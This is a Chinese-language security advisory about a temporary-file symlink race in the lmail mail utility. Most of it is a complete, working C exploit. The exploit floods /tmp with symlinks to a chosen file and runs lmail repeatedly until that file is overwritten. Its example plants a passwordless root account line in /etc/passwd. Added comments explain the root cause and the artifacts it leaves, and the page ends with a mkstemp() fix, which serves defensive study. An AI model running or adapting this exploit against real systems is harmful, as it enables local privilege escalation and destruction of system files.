
lmail存在竞争条件漏洞


发布时间:2001-07-06
更新时间:2001-07-06
严重程度:
威胁程度:本地管理员权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
http://ftp.unicamp.br/pub/unix-c/mail/lmail.tar.gz
详细描述
lmail使用了不安全的mktemp()函数,可以允许本地用户覆盖任意文件。
mktemp()只生成文件名而不创建文件,在生成文件名与随后fopen()打开该文件之间存在时间窗口,
这段时间内该路径上若已被放置符号链接,fopen()会跟随链接写入其指向的文件。
问题存在于(lmail.c)中的:
#define MAIL_TMPFILE "/tmp/rmXXXXXX"


...


static char tempfname[] = MAIL_TMPFILE;


...


if (fseek(stdin, 0L, 0) != 0) {
        mailfile = fopen(mktemp(tempfname), "w+");
...

测试代码
/* lmail-xpl.c
*
* Quick hack to exploit lmail
*
* Simply run it with the file you want to create/overwrite
* and the data you wish to place in the file.
*
* Example:
*
* $ gcc -g -Wall lmail-xpl.c -o lmail-xpl
* $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash
*
* Then login as owned... etc..
*
* by Charles Stevenson <core@ezlink.com>
*
* July 04 2001
*
* shoutz b10z
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Template passed to mkstemp() in main(); the file created from it receives a copy of the target file. */
#define TEMPFILE "/tmp/ez.XXXXXX"
/* Iteration count shared by both loops in main(): number of symlinks created and number of lmail runs. */
#define BRUTE 128

/* Prints the usage line to stderr and exits with status 1; defined after main(). */
void usage(char*);

/*
 * Proof-of-concept driver for the lmail temporary-file race described in the
 * advisory text above this listing.
 *
 * argv[1] is the path the symlinks will point at, argv[2] is the text piped
 * into lmail. Returns 0 at the end; exits with status 1 on bad usage or when
 * the scratch file cannot be created.
 *
 * Reading notes for defenders:
 *  - Root cause is in lmail, not here: it opens a name returned by mktemp()
 *    with fopen(), so a link that already exists at that name is followed.
 *    Creating the file atomically (mkstemp(), or open() with O_CREAT|O_EXCL)
 *    closes the window.
 *  - Artifacts visible in this listing: a batch of BRUTE symlinks under /tmp
 *    that all point at one target, BRUTE back-to-back lmail invocations from
 *    the same parent, and a /tmp/ez.* scratch file.
 *  - Every shell command below is assembled with sprintf() into temp[512]
 *    from argv without any length check or quoting, and then passed to
 *    system(); none of the system()/symlink() return values are checked.
 */
int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   pid_t pid;
   char temp[512];
  
   /* Both arguments are required; usage() calls exit(1), so control does not continue past it. */
   if (argc < 3){
      usage(argv[0]);
   }

   /*
    * mkstemp() creates and opens the scratch file in one step and rewrites
    * tempfile with the generated name. fd is only tested here; it is never
    * used or closed later in this function.
    */
   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "lmail-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   /* NOTE(review): argv[1] is interpolated unquoted into a shell command line. */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
  
   /* set the date/time */
   /* touch -r stamps the copy with the reference file's timestamps. */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   /* The process ID is the starting value for the numeric suffix of the link names below. */
   pid = getpid();

   fprintf(stderr, "> creating a lot of symlinks\n");

   /*
    * Create BRUTE links named /tmp/lmail<pid+i>, each pointing at argv[1].
    * NOTE(review): the lmail.c excerpt quoted in the advisory shows the
    * template "/tmp/rmXXXXXX", while these names use an "lmail" prefix; the
    * page does not explain the difference, so file-name based detection taken
    * from this listing should be checked against the installed lmail.
    */
   for (i=0;i<BRUTE;i++){
      sprintf(temp, "/tmp/lmail%d", pid+i);
      symlink(argv[1], temp);
   }

   /*
    * Build one pipeline that feeds a newline followed by argv[2] to
    * "lmail -f", then run that same command BRUTE times.
    */
   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s | lmail -f\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   /* List the target so the operator can see its current size and timestamps. */
   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   /*
    * The globs remove every /tmp/lmail* and /tmp/ez.* entry the caller is
    * allowed to delete. /tmp/ez.* also matches the scratch file created from
    * TEMPFILE, so the copy made above does not survive this step.
    */
   sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*");
   system(temp);
  
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

/*
 * Write the expected command-line form to stderr and terminate the process
 * with exit status 1.
 *
 * name: program name shown in the message (main passes argv[0]).
 * Does not return.
 */
void usage(char *name)
{
   fprintf(stderr,
           "usage: %s <filename> <data>\n",
           name);
   exit(1);
}

解决方案
尚无。通用的修复思路:改用mkstemp()原子地创建并打开临时文件(以O_CREAT|O_EXCL方式打开,路径上已存在文件或符号链接时会失败),不再使用mktemp()加fopen()的组合。

相关信息